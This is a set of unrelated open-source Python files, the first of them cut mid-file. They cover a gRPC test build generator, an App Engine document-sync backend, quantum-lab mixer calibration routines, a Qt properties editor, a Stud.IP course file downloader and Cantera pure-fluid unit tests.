'platforms': END2END_FIXTURES[f].platforms,
'ci_platforms': (END2END_FIXTURES[f].platforms
if END2END_FIXTURES[f].ci_mac else without(
END2END_FIXTURES[f].platforms, 'mac')),
'deps': [
'end2end_tests'
] + sec_deps,
'vs_proj_dir': 'test/end2end/fixtures',
}
for f in sorted(END2END_FIXTURES.keys())
] + [
{
'name': '%s_nosec_test' % f,
'build': 'test',
'language': 'c',
'secure': False,
'src': ['test/core/end2end/fixtures/%s.cc' % f],
'run': False,
'platforms': END2END_FIXTURES[f].platforms,
'ci_platforms': (END2END_FIXTURES[f].platforms
if END2END_FIXTURES[f].ci_mac else without(
END2END_FIXTURES[f].platforms, 'mac')),
'deps': [
'end2end_nosec_tests'
] + unsec_deps,
'vs_proj_dir': 'test/end2end/fixtures',
}
for f in sorted(END2END_FIXTURES.keys())
if not END2END_FIXTURES[f].secure
],
'tests': [
{
'name': '%s_test' % f,
'args': [t],
'exclude_configs': END2END_FIXTURES[f].exclude_configs,
'exclude_iomgrs': list(set(END2END_FIXTURES[f].exclude_iomgrs) |
set(END2END_TESTS[t].exclude_iomgrs)),
'platforms': END2END_FIXTURES[f].platforms,
'ci_platforms': (END2END_FIXTURES[f].platforms
if END2END_FIXTURES[f].ci_mac else without(
END2END_FIXTURES[f].platforms, 'mac')),
'flaky': END2END_TESTS[t].flaky,
'language': 'c',
'cpu_cost': END2END_TESTS[t].cpu_cost,
}
for f in sorted(END2END_FIXTURES.keys())
for t in sorted(END2END_TESTS.keys()) if compatible(f, t)
] + [
{
'name': '%s_nosec_test' % f,
'args': [t],
'exclude_configs': END2END_FIXTURES[f].exclude_configs,
'exclude_iomgrs': list(set(END2END_FIXTURES[f].exclude_iomgrs) |
set(END2END_TESTS[t].exclude_iomgrs)),
'platforms': END2END_FIXTURES[f].platforms,
'ci_platforms': (END2END_FIXTURES[f].platforms
if END2END_FIXTURES[f].ci_mac else without(
END2END_FIXTURES[f].platforms, 'mac')),
'flaky': END2END_TESTS[t].flaky,
'language': 'c',
'cpu_cost': END2END_TESTS[t].cpu_cost,
}
for f in sorted(END2END_FIXTURES.keys())
if not END2END_FIXTURES[f].secure
for t in sorted(END2END_TESTS.keys())
if compatible(f, t) and not END2END_TESTS[t].secure
],
'core_end2end_tests': dict(
(t, END2END_TESTS[t].secure)
for t in END2END_TESTS.keys()
)
}
print yaml.dump(json)
if __name__ == '__main__':
main()
| |
#!/usr/bin/env python
import os
import time
import logging
import hashlib
import random
import wsgiref.handlers
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext import db
from google.appengine.ext.webapp import template
from google.appengine.api import memcache
import json
# Dear reader: I learned just as much Python to get this somewhat working. I'm sorry.
class DocRevision(db.Model):
hash = db.StringProperty()
owner = db.UserProperty()
session = db.StringProperty()
name = db.StringProperty()
data = db.TextProperty()
version = db.IntegerProperty()
lastUpdate = db.DateTimeProperty(auto_now_add=True)
def forJSON(self):
return {'data' : ''+self.data , 'name' : self.name , 'version' : self.version}
def infoJSON(self):
return {'name' : self.name , 'hash' : self.hash , 'version' : self.version , 'lastUpdate' : str(self.lastUpdate)}
class SavedDoc(db.Model):
hash = db.StringProperty()
owner = db.UserProperty()
session = db.StringProperty()
def forJSON(self):
return {'hash' : ''+self.hash}
class Gadget(webapp.RequestHandler):
def get(self):
user = users.get_current_user()
docHash = self.request.get('id');
template_file = 'gadget.t.xml';
path = os.path.join(os.path.dirname(__file__), template_file)
self.response.headers['Content-Type'] = 'text/xml'
self.response.out.write(template.render(path, { 'docId' : docHash }))
class MainPage(webapp.RequestHandler):
def randomHash(self):
return hashlib.sha1(str(random.random())).hexdigest();
def get(self):
user = users.get_current_user()
docHash = self.request.get('id');
isTest = self.request.get('test');
isBlank = self.request.get('blank')
isGadget = self.request.get('gadget')
gadgetLibs = self.request.get('libs')
if(gadgetLibs is not None and gadgetLibs != ""):
gadgetLibs = gadgetLibs.split(",")
if docHash is None or docHash == "":
uri = '/?id='+self.randomHash()
if self.request.get('template') != "":
uri = uri + "&template=" + self.request.get('template')
path = os.path.join(os.path.dirname(__file__), "redirect.t.html")
self.response.out.write(template.render(path, { 'uri' : uri }))
else:
userName = "";
if user:
userName = user.nickname()
newId = self.randomHash();
guidBase = self.randomHash();
now = int(time.time() * 1000);
sessionId = self.randomHash();
self.response.headers['Content-Type'] = 'text/html'
template_file = 'index.t.html.mini';
if self.request.get('test') == '1':
template_file = 'index.t.html'
path = os.path.join(os.path.dirname(__file__), template_file)
self.response.out.write(template.render(path, { 'docId' : docHash , 'userName' : userName, 'newId' : newId, 'guidBase' : guidBase, 'nowMilliseconds': now, "sessionId" : sessionId, "isTest" : isTest, "isBlank" : isBlank, "isGadget" : isGadget, 'gadgetLibs' : gadgetLibs }))
class Login(webapp.RequestHandler):
def get(self):
user = users.get_current_user()
uri = self.request.get("continue")
if user:
self.redirect(uri)
else:
self.redirect(users.create_login_url(uri))
class SaveDocument(webapp.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
docHash = self.request.get('hash');
exists = False
docs = SavedDoc.gql("WHERE owner = :1 AND hash = :2", user, docHash)
for doc in docs:
exists = True;
break;
if not exists:
doc = SavedDoc();
doc.hash = docHash;
doc.owner = user;
doc.put()
self.response.out.write(json.write({ 'success' : True }))
else:
self.response.out.write(json.write({ 'error' : "no_login" }))
class GetSavedDocuments(webapp.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
docs = SavedDoc.gql('WHERE owner = :1', user).fetch(100)
data = []
for doc in docs:
# find the current revision
if doc.hash != "":
revs = DocRevision.gql("WHERE hash = :1 ORDER BY version DESC", doc.hash).fetch(1)
for rev in revs:
data.append(rev.infoJSON())
self.response.out.write(json.write(data))
else:
self.response.out.write(json.write({ 'error' : "no_login" }))
class AddData(webapp.RequestHandler):
def post(self):
user = users.get_current_user() # optional
key = 'version'
version = memcache.get(key)
if version is None:
version = 1 + int(time.time());
memcache.set(key, version)
else:
version = memcache.incr(key)
docHash = self.request.get('hash');
rev = DocRevision()
rev.owner = user
rev.hash = docHash
rev.name = self.request.get('name').decode('utf-8');
rev.data = self.request.get('data').decode('utf-8');
rev.session = self.request.get('session')
logging.info("Saving data "+rev.hash)
rev.version = int(version)
rev.put()
self.response.out.write(json.write({}))
# cleanup old versions
revs = DocRevision.gql("WHERE hash = :1 ORDER BY version DESC", docHash).fetch(40)
count = 0;
for rev in revs:
if count > 20: # skip entries that might still be needed by other users
rev.delete()
count = count + 1
class FetchData(webapp.RequestHandler):
def get(self):
user = users.get_current_user()
#if user:
docHash = self.request.get('hash')
session = self.request.get('session')
maxVersion = int(self.request.get('max_version'))
logging.info(maxVersion)
i = 0;
found = False;
logging.info("Looking for data "+str(i))
newMaxVersion = 0;
revs = []
if maxVersion > 0:
revs = DocRevision.gql('WHERE hash = :1 AND version > :2 ORDER BY version', docHash, maxVersion).fetch(10)
else:
revs = DocRevision.gql("WHERE hash = :1 ORDER BY version DESC", docHash).fetch(1) #WHERE owner = :1, user
found = True
rows = [];
for rev in revs:
newMaxVersion = rev.version;
if maxVersion == 0 or rev.session != session: # filter my own rows (cant do this in the query because of GQL limitations)
rows.append(rev.forJSON())
found = True;
else:
logging.info("ignoring row because it is my own: " + session + " = " + rev.session + ";")
data = {'data' : rows , 'max_version' : newMaxVersion }
self.response.out.write(json.write(data))
#else:
# self.response.out.write(json.write({error: "need login"}))
class FetchCustomShape(webapp.RequestHandler):
def get(self):
self.response.out.write('{"__CLASS__":"block::ui::CustomShape","_name": "Test", _html: "<table width=100% height=100% style=\'background-color: red\'><tr><td valign=center align=center class=textField></td></tr></table>"}')
def main():
application = webapp.WSGIApplication(
[('/', MainPage),
('/add', AddData),
('/fetch', FetchData),
('/gadget.xml', Gadget),
('/shape', FetchCustomShape),
('/login', Login),
('/documents', GetSavedDocuments),
('/save', SaveDocument)],
debug=True)
wsgiref.handlers.CGIHandler().run(application)
if __name__ == "__main__":
main()
| |
import cma
from deprecated import deprecated
from qcodes.instrument.parameter import ManualParameter
from pycqed.measurement import detector_functions as det
from pycqed.measurement import mc_parameter_wrapper as pw
from pycqed.measurement.optimization import nelder_mead
from pycqed.analysis import measurement_analysis as ma
# Imported for type annotations
from pycqed.measurement.measurement_control import MeasurementControl
from pycqed.instrument_drivers.physical_instruments.USB_SA124B import SignalHound_USB_SA124B
'''
Contains general calibration routines, most notably for calculating mixer
offsets and skewness. Not all has been transferred to QCodes.
Those things that have not been transferred have a placeholder function and
raise a NotImplementedError.
'''
@deprecated(version='0.4', reason='not used within pyqed')
def measure_E_c(**kw):
raise NotImplementedError('see archived calibration toolbox')
@deprecated(version='0.4', reason='not used within pyqed')
def mixer_carrier_cancellation_duplexer(**kw):
raise NotImplementedError('see archived calibration toolbox')
def mixer_carrier_cancellation(
SH: SignalHound_USB_SA124B,
source,
MC: MeasurementControl,
chI_par, chQ_par,
frequency: float = None,
SH_ref_level: float = -40,
init_stepsize: float = 0.1,
x0=(0.0, 0.0),
label: str = 'Offset_calibration',
ftarget=-110,
maxiter=300
):
"""
Varies the mixer offsets to minimize leakage at the carrier frequency.
this is a generic version.
Args:
SH (instr) : Signal hound used to measure power
source (instr) : mw_source that provides the leakage tone
MC (instr) :
chI_par (par) :
chQ_par (par) :
frequency (float) : the frequency in Hz at which to minimize leakage
SH_ref_level (float) : Signal hound reference level
init_stepsize (float): initial stepsize for Nelder mead algorithm
x0 (tuple) : starting point for optimization
ftarget (float) : termination value
"""
source.on()
if frequency is None:
frequency = source.frequency()
else:
source.frequency(frequency)
'''
Make coarse sweeps to approximate the minimum
'''
SH.ref_lvl(SH_ref_level)
detector = det.Signal_Hound_fixed_frequency(
SH,
frequency=(source.frequency()),
Navg=5,
delay=0.0,
prepare_for_each_point=False
)
ad_func_pars = {'adaptive_function': cma.fmin,
'x0': x0,
'sigma0':1,
'options': {'maxiter': maxiter, # maximum function cals
# Scaling for individual sigma's
'cma_stds': [init_stepsize]*2,
'ftarget': ftarget
},
'minimize': True}
MC.set_sweep_functions([chI_par, chQ_par])
MC.set_detector_function(detector) # sets test_detector
MC.set_adaptive_function_parameters(ad_func_pars)
MC.run(name=label, mode='adaptive')
a = ma.OptimizationAnalysis(label=label)
# v2 creates a pretty picture of the optimizations
ma.OptimizationAnalysis_v2(label=label)
ch_1_min = a.optimization_result[0][0]
ch_2_min = a.optimization_result[0][1]
return ch_1_min, ch_2_min
@deprecated(version='0.4', reason='not used within pyqed')
def multi_channel_mixer_carrier_cancellation(SH, source, MC,
channel_pars,
frequency: float=None,
SH_ref_level: float=-40,
init_stepsize: float=0.1,
x0: tuple=None):
"""
Varies the mixer offsets to minimize leakage at the carrier frequency.
this is a generic version compatible with multiple channels.
Args:
SH (instr) : Signal hound used to measure power
source (instr) : mw_source that provides the leakage tone
MC (instr) :
channel_pars (par) : list of offset parameters
frequency (float) : the frequency in Hz at which to minimize leakage
SH_ref_level (float) : Signal hound reference level
init_stepsize (float): initial stepsize for Nelder mead algorithm
x0 (tuple) : starting point for optimization
returns:
optimization_result (tuple): a tuple containing the final value for
each of the varied parameters.
"""
source.on()
if frequency is None:
frequency = source.frequency()
else:
source.frequency(frequency)
SH.ref_lvl(SH_ref_level)
detector = det.Signal_Hound_fixed_frequency(
SH, frequency=(source.frequency()),
Navg=5, delay=0.0, prepare_each_point=False)
if x0 is None:
x0 = [0.0]*len(channel_pars)
ad_func_pars = {'adaptive_function': nelder_mead,
'x0': x0,
'initial_step': [init_stepsize]*len(channel_pars),
'no_improv_break': 15,
'minimize': True,
'maxiter': 500}
MC.set_sweep_functions(channel_pars)
MC.set_detector_function(detector) # sets test_detector
MC.set_adaptive_function_parameters(ad_func_pars)
MC.run(name='Offset_calibration', mode='adaptive')
a = ma.OptimizationAnalysis(label='Offset_calibration')
return a.optimization_result[0]
@deprecated(version='0.4', reason='not used within pyqed')
def mixer_skewness_calibration_QWG(SH, source, QWG,
alpha, phi,
MC,
ch_pair=1,
frequency=None, f_mod=None,
SH_ref_level: float=-40,
name='mixer_skewness_calibration_QWG'):
'''
Inputs:
SH (instrument)
Source (instrument) MW-source used for driving
alpha (parameter)
phi (parameter)
frequency (float Hz) Spurious SB freq: f_source - f_mod
f_mod (float Hz) Modulation frequency
I_ch/Q_ch (int or str) Specifies the AWG channels
returns:
alpha, phi the coefficients that go in the predistortion matrix
For the spurious sideband:
alpha = 1/QI_amp_optimal
phi = -IQ_phase_optimal
For details, see Leo's notes on mixer skewness calibration in the docs
'''
QWG.ch1_default_waveform('zero')
QWG.ch2_default_waveform('zero')
QWG.ch3_default_waveform('zero')
QWG.ch4_default_waveform('zero')
QWG.run_mode('CONt')
QWG.stop()
QWG.start()
if f_mod is None:
f_mod = QWG.get('ch_pair{}_sideband_frequency'.format(ch_pair))
else:
QWG.set('ch_pair{}_sideband_frequency'.format(ch_pair), f_mod)
if frequency is None:
# Corresponds to the frequency where to minimize with the SH
frequency = source.frequency.get() - f_mod
SH.ref_lvl(SH_ref_level)
d = det.Signal_Hound_fixed_frequency(SH, frequency)
ad_func_pars = {'adaptive_function': nelder_mead,
'x0': [1.0, 0.0],
'initial_step': [.15, 10],
'no_improv_break': 10,
'minimize': True,
'maxiter': 500}
MC.set_sweep_functions([alpha, phi])
MC.set_detector_function(d)
MC.set_adaptive_function_parameters(ad_func_pars)
MC.run(name=name, mode='adaptive')
a = ma.OptimizationAnalysis()
# phi and alpha are the coefficients that go in the predistortion matrix
alpha = a.optimization_result[0][0]
phi = a.optimization_result[0][1]
return phi, alpha
@deprecated(version='0.4', reason='not used within pyqed')
def mixer_skewness_calibration_5014(SH, source, station,
MC=None,
QI_amp_ratio=None, IQ_phase=None,
frequency=None, f_mod=10e6,
I_ch=1, Q_ch=2,
name='mixer_skewness_calibration_5014'):
'''
Loads a cos and sin waveform in the specified I and Q channels of the
tektronix 5014 AWG (taken from station.pulsar.AWG).
By looking at the frequency corresponding with the spurious sideband the
phase_skewness and amplitude skewness that minimize the signal correspond
to the mixer skewness.
Inputs:
SH (instrument)
Source (instrument) MW-source used for driving
station (qcodes station) Contains the AWG and pulasr sequencer
QI_amp_ratio (parameter) qcodes parameter
IQ_phase (parameter)
frequency (float Hz) Spurious SB freq: f_source - f_mod
f_mod (float Hz) Modulation frequency
I_ch/Q_ch (int or str) Specifies the AWG channels
returns:
alpha, phi the coefficients that go in the predistortion matrix
For the spurious sideband:
alpha = 1/QI_amp_optimal
phi = -IQ_phase_optimal
For details, see Leo's notes on mixer skewness calibration in the docs
'''
if frequency is None:
# Corresponds to the frequency where to minimize with the SH
frequency = source.frequency.get() - f_mod
if QI_amp_ratio is None:
QI_amp_ratio = ManualParameter('QI_amp', initial_value=1)
if IQ_phase is None:
IQ_phase = ManualParameter('IQ_phase', unit='deg', initial_value=0)
if MC is None:
MC = station.MC
if type(I_ch) is int:
I_ch = 'ch{}'.format(I_ch)
if type(Q_ch) is int:
Q_ch = 'ch{}'.format(Q_ch)
d = det.SH_mixer_skewness_det(frequency, QI_amp_ratio, IQ_phase, SH,
f_mod=f_mod,
I_ch=I_ch, Q_ch=Q_ch, station=station)
S1 = pw.wrap_par_to_swf(QI_amp_ratio)
S2 = pw.wrap_par_to_swf(IQ_phase)
ad_func_pars = {'adaptive_function': nelder_mead,
'x0': [1.0, 0.0],
'initial_step': [.15, 10],
'no_improv_break': 12,
'minimize': True,
'maxiter': 500}
MC.set_sweep_functions([S1, S2])
MC.set_detector_function(d)
MC.set_adaptive_function_parameters(ad_func_pars)
MC.run(name=name, mode='adaptive')
a = ma.OptimizationAnalysis()
# phi and alpha are the coefficients that go in the predistortion matrix
alpha = 1/a.optimization_result[0][0]
phi = -1*a.optimization_result[0][1]
return phi, alpha
@deprecated(version='0.4', reason='not used within pyqed')
def mixer_skewness_calibration_adaptive(**kw):
raise NotImplementedError('see archived calibration toolbox')
@deprecated(version='0.4', reason='not used within pyqed')
def mixer_carrier_cancellation_5014(AWG, SH, source, MC,
frequency=None,
AWG_channel1=1,
AWG_channel2=2,
SH_ref_level: float=-40,
**kw):
'''
Varies the mixer offsets to minimize leakage at the carrier frequency.
this is the version for a tektronix AWG.
station: QCodes station object that contains the instruments
source: the source for which carrier leakage must be minimized
frequency: frequency in Hz on which to minimize leakage, if None uses the
current frequency of the source
returns:
ch_1_min, ch_2_min
voltage_grid defines the ranges for the preliminary coarse sweeps.
If the range is too small, add another number infront of -0.12
Note: Updated for QCodes
'''
source.on()
if frequency is None:
frequency = source.get('frequency')
else:
source.set('frequency', frequency)
'''
Make coarse sweeps to approximate the minimum
'''
S1 = AWG.ch1_offset # to be dedicated to actual channel
S2 = AWG.ch2_offset
SH.ref_lvl(SH_ref_level)
detector = det.Signal_Hound_fixed_frequency(
SH, frequency=(source.frequency.get()),
Navg=5, delay=0.0, prepare_for_each_point=False)
ad_func_pars = {'adaptive_function': nelder_mead,
'x0': [0.0, 0.0],
'initial_step': [0.01, 0.01],
'no_improv_break': 15,
'minimize': True,
'maxiter': 500}
MC.set_sweep_functions([S1, S2])
MC.set_detector_function(detector) # sets test_detector
MC.set_adaptive_function_parameters(ad_func_pars)
MC.run(name='Offset_calibration', mode='adaptive')
a = ma.OptimizationAnalysis(auto=True, label='Offset_calibration')
ch_1_min = a.optimization_result[0][0]
ch_2_min = a.optimization_result[0][1]
return ch_1_min, ch_2_min
@deprecated(version='0.4', reason='not used within pyqed')
def mixer_carrier_cancellation_UHFQC(UHFQC, SH, source, MC,
frequency=None,
SH_ref_level: float=-40,
**kw):
'''
Varies the mixer offsets to minimize leakage at the carrier frequency.
this is the version for a UHFQC.
station: QCodes station object that contains the instruments
source: the source for which carrier leakage must be minimized
frequency: frequency in Hz on which to minimize leakage, if None uses the
current frequency of the source
returns:
ch_1_min, ch_2_min
voltage_grid defines the ranges for the preliminary coarse sweeps.
If the range is too small, add another number infront of -0.12
Note: Updated for QCodes
'''
source.on()
if frequency is None:
frequency = source.get('frequency')
else:
source.set('frequency', frequency)
'''
Make coarse sweeps to approximate the minimum
'''
S1 = UHFQC.sigouts_0_offset
S2 = UHFQC.sigouts_1_offset
SH.ref_lvl(SH_ref_level)
detector = det.Signal_Hound_fixed_frequency(
SH, frequency=(source.frequency.get()),
Navg=5, delay=0.0, prepare_each_point=False)
ad_func_pars = {'adaptive_function': nelder_mead,
'x0': [0.0, 0.0],
'initial_step': [0.01, 0.01],
'no_improv_break': 15,
'minimize': True,
'maxiter': 500}
MC.set_sweep_functions([S1, S2])
MC.set_detector_function(detector) # sets test_detector
MC.set_adaptive_function_parameters(ad_func_pars)
MC.run(name='Offset_calibration', mode='adaptive')
a = ma.OptimizationAnalysis(auto=True, label='Offset_calibration')
ch_1_min = a.optimization_result[0][0]
ch_2_min = a.optimization_result[0][1]
return ch_1_min, ch_2_min
| |
import os
from DTL.qt import QtCore, QtGui
from DTL.api import apiUtils
from DTL.gui.base import BaseGUI
#------------------------------------------------------------
#------------------------------------------------------------
class PropertiesEditor(QtGui.QWidget, BaseGUI):
#------------------------------------------------------------
def __init__(self, model=None, proxyModel=None, editors={}, *args, **kwds):
self._qtclass = QtGui.QWidget
apiUtils.synthesize(self, 'model', model)
apiUtils.synthesize(self, 'proxyModel', proxyModel)
apiUtils.synthesize(self, 'editors', editors)
apiUtils.synthesize(self, 'busy', False)
BaseGUI.__init__(self, **kwds)
if proxyModel :
self.setProxyModel(proxyModel)
elif model :
self.setModel(model)
#------------------------------------------------------------
def onFinalize(self):
self.main_splitter = QtGui.QSplitter()
self.main_splitter.addWidget(self.treeView)
self.main_splitter.addWidget(self.scrollArea)
self.mainLayout.addWidget(self.main_splitter)
self.main_splitter.setSizes([150,250])
self.setEditors()
for key, editor in self.editors.items() :
self.properties_layout.addWidget(editor)
editor.setVisible(False)
#------------------------------------------------------------
def setEditors(self):
'''For subclass to implement all of the editors'''
self._editors['Node'] = NodeEditor()
self._editors['FloatTransformNode'] = FloatTransformNodeEditor()
self._editors['IntTransformNode'] = IntTransformNodeEditor()
self._editors['Layer'] = LayerEditor()
#------------------------------------------------------------
def setProxyModel(self, proxyModel):
self._proxyModel = proxyModel
self.treeView.setModel(proxyModel)
for editor in self.editors.values() :
editor.setProxyModel(proxyModel)
#------------------------------------------------------------
def setModel(self, model):
self._model = model
self.treeView.setModel(model)
self.treeView.selectionModel().selectionChanged.connect(self.selectionChanged)
for editor in self.editors.values() :
editor.setModel(model)
#------------------------------------------------------------
def selectionChanged(self):
if not self.busy:
self.setBusy(True)
selectedIndexes = self.treeView.selectionModel().selectedIndexes()
self.setSelection(selectedIndexes[-1])
self.setBusy(False)
#------------------------------------------------------------
def clearSelection(self):
for editor in self.editors.values():
editor.setVisible(False)
#------------------------------------------------------------
def setSelection(self, index):
if self.proxyModel is not None :
index = self.proxyModel.mapToSource(index)
self.clearSelection()
node = index.internalPointer()
if node is None :
return
for editor in self.editors.values():
editor.setSelection(index)
for item in node.__class__.__mro__ :
if not hasattr(item, '__name__') :
continue
if self.editors.get(item.__name__, False):
self.editors[item.__name__].setVisible(True)
#------------------------------------------------------------
#------------------------------------------------------------
class Editor(QtGui.QWidget, BaseGUI):
#------------------------------------------------------------
def __init__(self, model=None, proxyModel=None, **kwds):
self._qtclass = QtGui.QWidget
apiUtils.synthesize(self, 'model', model)
apiUtils.synthesize(self, 'proxyModel', proxyModel)
apiUtils.synthesize(self, 'dataMapper', QtGui.QDataWidgetMapper())
#self._dataMapper.setSubmitPolicy(QtGui.QDataWidgetMapper.ManualSubmit)
BaseGUI.__init__(self, **kwds)
#------------------------------------------------------------
def setProxyModel(self, proxyModel):
self._proxyModel = proxyModel
self.setModel(proxyModel.sourceModel())
#------------------------------------------------------------
def setModel(self, model):
self._model = model
self.dataMapper.setModel(self._model)
self.setMappings()
#------------------------------------------------------------
def setMappings(self):
'''For Subclass to implement to map the UI elements to the data'''
#self.dataMapper.addMapping(self.uiName, 0)
#self.dataMapper.addMapping(self.uiType, 1)
pass
#------------------------------------------------------------
def setSelection(self, index):
parent = index.parent()
self.dataMapper.setRootIndex(parent)
self.dataMapper.setCurrentModelIndex(index)
#------------------------------------------------------------
#------------------------------------------------------------
class NodeEditor(Editor):
#------------------------------------------------------------
def __init__(self, *args, **kwds):
super(NodeEditor, self).__init__(*args, **kwds)
#------------------------------------------------------------
def setMappings(self):
self.dataMapper.addMapping(self.prop_name, 0)
#------------------------------------------------------------
#------------------------------------------------------------
class FloatTransformNodeEditor(Editor):
#------------------------------------------------------------
def __init__(self, *args, **kwds):
super(FloatTransformNodeEditor, self).__init__(*args, **kwds)
#------------------------------------------------------------
def setMappings(self):
self.dataMapper.addMapping(self.prop_x, 1)
self.dataMapper.addMapping(self.prop_y, 2)
self.dataMapper.addMapping(self.prop_z, 3)
#------------------------------------------------------------
#------------------------------------------------------------
class IntTransformNodeEditor(Editor):
#------------------------------------------------------------
def __init__(self, *args, **kwds):
super(IntTransformNodeEditor, self).__init__(*args, **kwds)
#------------------------------------------------------------
def setMappings(self):
self.dataMapper.addMapping(self.prop_x, 1)
self.dataMapper.addMapping(self.prop_y, 2)
self.dataMapper.addMapping(self.prop_z, 3)
#------------------------------------------------------------
#------------------------------------------------------------
class LayerEditor(Editor):
#------------------------------------------------------------
def __init__(self, *args, **kwds):
super(LayerEditor, self).__init__(*args, **kwds)
#------------------------------------------------------------
def setMappings(self):
self.dataMapper.addMapping(self.prop_index, 1)
if __name__ == '__main__' :
from DTL.db.models import SceneGraphModel
from DTL.db.data import Node, FloatTransformNode, IntTransformNode, Layer
from DTL.gui import Core
root = Layer()
node1 = Node(name='Node1', parent=root)
node2 = Node(name='Node2', parent=root)
layer1 = Layer(name='Layer1', parent=node2)
node3 = Node(name='Node3', parent=layer1)
trans1 = FloatTransformNode(name='Trans1', parent=node2)
trans2 = FloatTransformNode(name='Trans2', parent=trans1)
trans3 = IntTransformNode(name='Trans3', parent=trans1)
model = SceneGraphModel(root)
propeditor = PropertiesEditor(model=model)
propeditor.show()
Core.Start()
| |
#!/usr/bin/python3
"""
StudDP downloads files from Stud.IP.
"""
import json
import logging
import time
import sys
import re
import optparse
from pidfile import PidFile
import keyring
import getpass
import daemon
from . import *
from .picker import Picker
from .APIWrapper import APIWrapper
LOG = logging.getLogger(__name__)
LOG_PATH = os.path.expanduser(os.path.join('~', '.studdp'))
PID_FILE = os.path.expanduser(os.path.join('~', '.studdp', 'studdp.pid'))
WIN_INVALID_CHARACTERS = [":", "<", ">", "|", "\?", "\*"]
class StudDP:
"""
The main program loops until interrupted.
Every time files were changed after the last check, they are downloaded.
Files are also downloaded if they do not exist locally.
"""
def __init__(self,
config,
api_helper,
daemonize=False,
on_windows=False,
update=False):
"""
Initializes the API and the update frequencies.
"""
self.config = config
self.interval = self.config['interval']
self.api = api_helper
self.daemonize = daemonize
self.on_windows = on_windows
self.update = update
def __del__(self):
LOG.info('Invoking exit.')
with open(CONFIG_FILE, 'w') as wfile:
LOG.info('Writing config.')
json.dump(self.config, wfile, sort_keys=True, indent=4 * ' ')
LOG.info('Exiting.')
def _needs_download(self, document):
"""
Checks if a download of the document is needed.
"""
return ((int(document['chdate']) > self.config['last_check']) and
self.update) or not \
os.path.exists(os.path.join(document['path'],
document['filename']))
def __call__(self):
"""
Starts the main loop and checks
periodically for document changes and downloads.
"""
while True:
try:
courses = self.api.get_courses()
except Exception:
LOG.exception("Getting courselist failed. Stacktrace:")
LOG.info('Checking courses.')
for course in courses:
title = course['title']
LOG.debug('Course: %s', title)
if title in self.config['selected_courses']:
LOG.info('Checking files for %s', title)
try:
documents = self.api.get_documents(course, self.config['renaming'])
except Exception:
LOG.exception("Getting course %s failed. Stacktrace:" \
% course["title"])
continue
for document in documents:
if self.on_windows: # Salt Path
for char in WIN_INVALID_CHARACTERS:
document["path"] = re.sub(
char, "", document["path"])
document["filename"] = re.sub(
char, "", document["filename"])
if self._needs_download(document):
path = os.path.join(
document['path'], document['filename'])
LOG.info('Downloading %s...', path)
try:
self.api.download_document(document, path)
LOG.debug('Saved %s', path)
except Exception:
LOG.exception("Downloading to %s failed. Stacktrace:" % path)
else:
LOG.debug('Skipping files for %s', title)
self.config['last_check'] = time.time()
LOG.info('Done checking.')
if not self.daemonize:
return
time.sleep(self.interval)
def _setup_logging(log_to_stdout=False):
"""
Sets up the logging handlers.
"""
os.makedirs(LOG_PATH, exist_ok=True)
file_handler_info = logging.FileHandler(os.path.join(LOG_PATH, 'info.log'))
file_handler_info.setLevel(logging.DEBUG)
file_handler_info.setFormatter(logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
LOG.addHandler(file_handler_info)
if log_to_stdout:
out = logging.StreamHandler(sys.stdout)
out.setLevel(logging.INFO)
out.setFormatter(logging.Formatter(
'%(name)s - %(levelname)s - %(message)s'))
LOG.addHandler(out)
err = logging.StreamHandler(sys.stderr)
err.setLevel(logging.ERROR)
err.setFormatter(logging.Formatter(
'%(name)s - %(levelname)s - %(message)s'))
LOG.addHandler(err)
LOG.setLevel(logging.DEBUG)
LOG.info('Logging initialized.')
def _get_password(username, force_update=False):
LOG.info("Querying for password")
password = keyring.get_password("StudDP", username)
if not password or force_update:
password = getpass.getpass(
"Please enter password for user %s: " % username)
LOG.info("Adding new password to keyring")
keyring.set_password("StudDP", username, password)
return password
def _parse_args():
parser = optparse.OptionParser()
parser.add_option("-c", "--config",
action="store_true", dest="regenerate", default=False,
help="change course selection")
parser.add_option("-v", "--verbose",
action="store_true", dest="log_to_stdout", default=False,
help="print log to stdout")
parser.add_option("-d", "--daemonize",
action="store_true", dest="daemonize", default=False,
help="start as daemon. Use stopDP to end thread.")
parser.add_option("-w", "--windows",
action="store_true", dest="on_windows", default=False,
help="remove characters that are forbidden in windows paths")
parser.add_option("-u", "--update",
action="store_true", dest="update_courses", default=False,
help="update files when they are updated on StudIP")
parser.add_option("-p", "--password",
action="store_true", dest="update_password", default=False,
help="force password update")
return parser.parse_args()
def _load_config(config, options):
if config['username'] == "":
print("No username provided. "
"Please configure ~/.config/studdp/config.json first")
exit(1)
password = _get_password(config['username'], options.update_password)
api = APIWrapper((config['username'], password), config["base_address"], config["local_path"])
courses = api.get_courses()
if not config['courses_selected'] or options.regenerate:
LOG.info("Updating course selection")
titles = map(lambda x: x["title"], courses)
selection = Picker(
title="Select courses to download",
options=titles,
checked=config['selected_courses']).getSelected()
config["courses_selected"] = True
if selection:
config['selected_courses'] = selection
return api
def main():
(options, args) = _parse_args()
_setup_logging(options.log_to_stdout)
if not os.path.exists(CONFIG_FILE):
os.makedirs(os.path.dirname(CONFIG_FILE), exist_ok=True)
with open(CONFIG_FILE, "w") as f:
json.dump(DEFAULT_CONFIG, f, sort_keys=True, indent=4 * ' ')
with open(CONFIG_FILE, 'r') as rfile:
config = json.load(rfile)
api = _load_config(config, options)
task = StudDP(config, api, options.daemonize, options.on_windows, options.update_courses)
if options.daemonize:
with daemon.DaemonContext(pidfile=PidFile(PID_FILE)):
task()
else:
task()
if __name__ == "__main__":
main()
| |
from __future__ import division
import itertools
import numpy as np
import cantera as ct
from . import utilities
class TestPureFluid(utilities.CanteraTest):
""" Test functionality of the PureFluid class """
def setUp(self):
self.water = ct.Water()
def test_critical_properties(self):
self.assertNear(self.water.critical_pressure, 22.089e6)
self.assertNear(self.water.critical_temperature, 647.286)
self.assertNear(self.water.critical_density, 317.0)
def test_set_state(self):
self.water.PX = 101325, 0.5
self.assertNear(self.water.P, 101325)
self.assertNear(self.water.X, 0.5)
self.water.TX = 500, 0.8
self.assertNear(self.water.T, 500)
self.assertNear(self.water.X, 0.8)
def test_substance_set(self):
self.water.TV = 400, 1.45
self.assertNear(self.water.T, 400)
self.assertNear(self.water.v, 1.45)
self.water.PV = 101325, 1.45
self.assertNear(self.water.P, 101325)
self.assertNear(self.water.v, 1.45)
